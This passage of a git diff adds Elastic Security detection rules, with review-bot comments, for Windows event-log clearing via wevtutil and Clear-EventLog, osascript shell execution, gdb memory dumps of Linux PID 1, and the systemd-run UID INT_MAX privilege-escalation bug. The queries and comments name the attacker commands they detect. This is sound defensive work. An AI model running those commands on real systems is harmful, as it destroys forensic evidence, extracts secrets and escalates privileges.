"Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + }, + { + "id": "T1562.002", + "name": "Disable Windows Event Logging", + "reference": "https://attack.mitre.org/techniques/T1562/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "d331bbe2-6db4-4941-80a5-8270db72eb61_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_112.json b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_112.json new file mode 100644 index 00000000000..6a3609fd721 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_112.json 
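Review bot: The `threat` block in this hunk nests `T1562.002` (Disable Windows Event Logging) inside the `subtechnique` array of `T1070` (Indicator Removal), but T1562.002 is a sub-technique of T1562 (Impair Defenses), so the ids and the nesting contradict each other. The `/e:false` argument in the query is what justifies that sub-technique, so it should stay, but under its own `T1562` technique entry alongside T1070/T1070.001. The description also spells the binary "wevetutil" where the query uses `wevtutil.exe`. This file is a superseded snapshot (the same change adds version 112), and the JSONs look generated from an upstream rule source, so the correction presumably belongs there.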
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to clear or disable Windows event log stores using Windows wevetutil command. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Clearing Windows Event Logs", + "note": "## Triage and analysis\n\n### Investigating Clearing Windows Event Logs\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the execution of the `wevtutil.exe` utility or the `Clear-EventLog` cmdlet to clear event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for this action.\n- Analyze whether the cleared event log is pertinent to security and general monitoring. Administrators can clear non-relevant event logs using this mechanism. If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous actions, if any, are investigated accordingly with their response playbooks.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (process.name : \"wevtutil.exe\" or ?process.pe.original_file_name == \"wevtutil.exe\") and\n process.args : (\"/e:false\", \"cl\", \"clear-log\")\n ) or\n (\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n process.args : \"Clear-EventLog\"\n )\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + 
"Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + }, + { + "id": "T1562.002", + "name": "Disable Windows Event Logging", + "reference": "https://attack.mitre.org/techniques/T1562/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "d331bbe2-6db4-4941-80a5-8270db72eb61_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_106.json b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_106.json new file mode 100644 index 00000000000..a395ecb7cbe --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_106.json 
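Review bot: The `threat` mapping in this hunk places `T1562.002` (Disable Windows Event Logging) in the `subtechnique` array of `T1070`, but it is a sub-technique of T1562 (Impair Defenses), so the JSON references an id whose parent does not match and may render misleadingly in the rule details. The `wevtutil ... /e:false` branch of the query is the disable case that earns that sub-technique, so keep it, but as a separate T1562 technique entry. Two smaller documentation points: the `description` says "wevetutil" for `wevtutil`, and the tags list only Elastic Endgame and Elastic Defend as data sources while `index` also covers `logs-windows.*` and `logs-system.security*` (the UAC rule in this same change tags Sysmon). These files look generated from an upstream rule source, so the fix presumably belongs there.
```json
"technique": [
  {
    "id": "T1070",
    "name": "Indicator Removal",
    "reference": "https://attack.mitre.org/techniques/T1070/",
    "subtechnique": [
      {
        "id": "T1070.001",
        "name": "Clear Windows Event Logs",
        "reference": "https://attack.mitre.org/techniques/T1070/001/"
      }
    ]
  },
  {
    "id": "T1562",
    "name": "Impair Defenses",
    "reference": "https://attack.mitre.org/techniques/T1562/",
    "subtechnique": [
      {
        "id": "T1562.002",
        "name": "Disable Windows Event Logging",
        "reference": "https://attack.mitre.org/techniques/T1562/002/"
      }
    ]
  }
]
```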
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the shell process (sh) via scripting (JXA or AppleScript). Adversaries may use the doShellScript functionality in JXA or do shell script in AppleScript to execute system commands.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Shell Execution via Apple Scripting", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\", \"info\") and process.name == \"osascript\"] by process.pid\n [process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name == \"sh\" and process.args == \"-c\"] by process.parent.pid\n", + "references": [ + "https://developer.apple.com/library/archive/technotes/tn2065/_index.html", + "https://objectivebythesea.com/v2/talks/OBTS_v2_Thomas.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "d461fac0-43e8-49e2-85ea-3a58fe120b4f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "d461fac0-43e8-49e2-85ea-3a58fe120b4f_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_4.json b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_4.json new file mode 100644 index 00000000000..cd1d5baa84f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_4.json 
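Review bot: The rule ships with no `false_positives` entry and no `note` investigation guide, although `osascript` spawning `sh -c` is exactly how every legitimate `do shell script` in Automator workflows, MDM agent scripts and developer tooling runs, so a medium-severity alert with no triage guidance will mostly be closed as noise. I would add a `false_positives` line such as `"Legitimate automation (Automator, MDM agents, developer tooling) that runs shell commands through AppleScript/JXA; tune on process.parent.executable and the sh -c payload."` and a short `note` naming the first pivots: the `sh -c` child's full `process.command_line`, the osascript parent's own parent, and the user. Unlike the neighbouring rules in this package the sequence also carries no `timestamp_override: event.ingested`, which with `from: now-9m` presumably means endpoint events that arrive late are never evaluated; worth confirming that the omission is deliberate for sequence rules.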
@@ -0,0 +1,68 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the potential memory dump of the init process (PID 1) through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include \"truffleproc\" and \"bash-memory-dump\". This behavior should not happen by default, and should be investigated thoroughly.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux init (PID 1) Secret Dump via GDB", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and \nprocess.name == \"gdb\" and process.args in (\"--pid\", \"-p\") and process.args == \"1\"\n", + "references": [ + "https://github.com/controlplaneio/truffleproc", + "https://github.com/hajzer/bash-memory-dump" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 47, + "rule_id": "d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.007", + "name": "Proc Filesystem", + "reference": "https://attack.mitre.org/techniques/T1003/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_5.json b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_5.json new file mode 100644 index 00000000000..870c78f4388 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_5.json 
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the potential memory dump of the init process (PID 1) through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include \"truffleproc\" and \"bash-memory-dump\". This behavior should not happen by default, and should be investigated thoroughly.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux init (PID 1) Secret Dump via GDB", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and \nprocess.name == \"gdb\" and process.args in (\"--pid\", \"-p\") and process.args == \"1\"\n", + "references": [ + "https://github.com/controlplaneio/truffleproc", + "https://github.com/hajzer/bash-memory-dump" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.007", + "name": "Proc Filesystem", + "reference": "https://attack.mitre.org/techniques/T1003/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_6.json b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_6.json new file mode 100644 index 00000000000..c89c73eb8ec --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_6.json 
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the potential memory dump of the init process (PID 1) through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include \"truffleproc\" and \"bash-memory-dump\". This behavior should not happen by default, and should be investigated thoroughly.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux init (PID 1) Secret Dump via GDB", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.name == \"gdb\" and process.args in (\"--pid\", \"-p\") and process.args == \"1\"\n", + "references": [ + "https://github.com/controlplaneio/truffleproc", + "https://github.com/hajzer/bash-memory-dump" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.007", + "name": "Proc Filesystem", + "reference": "https://attack.mitre.org/techniques/T1003/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_5.json b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_5.json new file mode 100644 index 00000000000..b6ea9fe90bd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_5.json 
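Review bot: The argument match `process.args in ("--pid", "-p") and process.args == "1"` only catches the two-token spelling; `gdb --pid=1` passes the PID as the single argument `--pid=1` and is missed, and because the two clauses are tested independently, a `gdb -p <other-pid>` invocation that happens to carry a stray `1` argument would also fire. A more faithful condition is `process.name == "gdb" and ((process.args in ("--pid", "-p") and process.args == "1") or process.args == "--pid=1")`. Attaching through a differently named debugger (`gdb-multiarch`, `lldb`, or a renamed copy) is outside `process.name == "gdb"`, which is an acceptable scope but deserves a sentence in the description so analysts do not read the absence of an alert as absence of the technique. The setup text also links `fleet/8.10/agent-policy.html` while every other link uses `current`; the pinned version will go stale.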
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of the systemd-run command by a user with a UID that is larger than the maximum allowed UID size (INT_MAX). Some older Linux versions were affected by a bug which allows user accounts with a UID greater than INT_MAX to escalate privileges by spawning a shell through systemd-run.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via UID INT_MAX Bug Detected", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count >= 3 and user.id >= \"1000000000\"\n", + "references": [ + "https://twitter.com/paragonsec/status/1071152249529884674", + "https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh", + "https://gitlab.freedesktop.org/polkit/polkit/-/issues/74" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d55436a8-719c-445f-92c4-c113ff2f9ba5", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "d55436a8-719c-445f-92c4-c113ff2f9ba5_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d55abdfb-5384-402b-add4-6c401501b0c3_2.json b/packages/security_detection_engine/kibana/security_rule/d55abdfb-5384-402b-add4-6c401501b0c3_2.json new file mode 100644 index 00000000000..c6df78a6944 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d55abdfb-5384-402b-add4-6c401501b0c3_2.json 
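Review bot: `user.id >= "1000000000"` compares a keyword field (the `required_fields` entry declares it as `keyword`), so if EQL resolves this to a keyword range query the comparison is lexicographic rather than numeric: `"2"`, `"65534"` (nobody) and any UID whose first digit is above 1 sort after `"1000000000"` and would match, while the INT_MAX boundary (2147483647) that the description describes is not what is actually tested. A length-aware condition stays correct under string ordering because equal-length digit strings sort numerically: `(length(user.id) > 10 or (length(user.id) == 10 and user.id > "2147483647"))`. The `process.args == "-t"` match also misses the long form `--pty`, so `process.args in ("-t", "--pty")` would be more complete for the same PoC.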
